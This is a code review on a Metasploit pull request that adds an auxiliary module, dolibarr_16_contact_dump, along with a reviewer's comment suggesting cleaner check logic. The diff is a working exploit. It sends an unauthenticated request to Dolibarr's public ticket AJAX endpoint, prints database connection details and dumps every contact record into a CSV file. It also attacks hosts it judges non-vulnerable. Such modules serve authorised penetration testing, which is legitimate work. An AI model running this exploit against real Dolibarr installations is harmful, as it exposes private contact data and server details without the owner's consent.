modules/auxiliary/scanner/http/dolibarr_16_contact_dump.rb

```diff
@@ -0,0 +1,151 @@
+    elsif version == '0'
+      version = 'not found'
+      return [Exploit::CheckCode::Detected, version]
+    end
+
+    return [Exploit::CheckCode::Safe, version]
+  end
+
+  def exploit
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'public', 'ticket', 'ajax', 'ajax.php?action=getContacts&email=%')
+    }, 90, true)
+    vprint_line('--Exploit request--')
+    vprint_line("Domain: #{vhost}")
+    vprint_line("Target_URI: #{normalize_uri(target_uri.path, 'public', 'ticket', 'ajax', 'ajax.php?action=getContacts&email=%')}")
+
+    vprint_line('--Exploit response--')
+
+    res_json_document = res.get_json_document['contacts']
+
+    if res && res.code != 200
+      fail_with(Failure::UnexpectedReply, "Exploit response code: #{res.code}")
+    elsif res_json_document.nil?
+      fail_with(Failure::UnexpectedReply, 'Dolibarr database empty')
+    end
+
+    vprint_good("Response Code: #{res.code}")
+    vprint_good("Response Body: #{res.body}")
+
+    begin
+      print_good("Database type: #{res_json_document[0]['db']['type']}")
+      print_good("Database name: #{res_json_document[0]['db']['database_name']}")
+      print_good("Database user: #{res_json_document[0]['db']['database_user']}")
+      print_good("Database host: #{res_json_document[0]['db']['database_host']}")
+      print_good("Database port: #{res_json_document[0]['db']['database_port']}")
+    end
+
+    contact_fields = res.get_json_document['contacts'][0].keys
+    contact_fields.delete('db') # We do not want this in the csv
+
+    contact_entry_data = []
+
+    nbr_contact = res_json_document.length.to_i
+
+    print_good("Found #{nbr_contact} contacts.")
+
+    csv_string = CSV.generate do |csv| # Loop to write into csv
+      csv << contact_fields
+      nbr_contact.times do |num| # Loop on every contact
+        contact_fields.each do |element|
+          if res_json_document[num][element.to_s].is_a?(String) || res_json_document[num][element.to_s].is_a?(Int)
+            contact_entry_data << res_json_document[num][element.to_s].to_s.gsub("\r\n", ' ')
+          end
+        rescue StandardError
+          contact_entry_data << ' '
+        end
+        csv << contact_entry_data
+        contact_entry_data.clear
+      end
+    end
+
+    path = store_loot(
+      'dolibarr',
+      'application/CSV',
+      vhost,
+      csv_string,
+      '.csv'
+    )
+
+    print_good("#{rhost}:#{rport} - File saved in: #{path}")
+  end
+
+  def run_host(_ip)
+    check_code, version = check
+    if check_code == Exploit::CheckCode::Safe || check_code == Exploit::CheckCode::Detected
+      print_bad("Detected apparently non-vulnerable Dolibarr version: #{version}")
+      vprint_status('Proceeding to exploit anyway')
+      exploit
+    elsif check_code == Exploit::CheckCode::Appears
+      print_good("Detected vulnerable Dolibarr version: #{version}")
+      exploit
+    end
+  end
```

Comment:
Seems like the error is more of a warning as the module proceeds anyway...

Also, the logic here seems needlessly messy. The module continues with exploitation when the target is `CheckCode::Safe` but aborts when `CheckCode::Unknown`.

```suggestion
  def run_host(_ip)
    check_code, version = check

    if check_code == Exploit::CheckCode::Safe || check_code == Exploit::CheckCode::Detected
      print_warning("Detected apparently non-vulnerable Dolibarr version: #{version} - proceeding anyway...")
    elsif check_code == Exploit::CheckCode::Appears
      print_good("Detected vulnerable Dolibarr version: #{version}")
    else
      fail_with(Failure::Unknown, '...') # elaborate
    end

    exploit
  end
```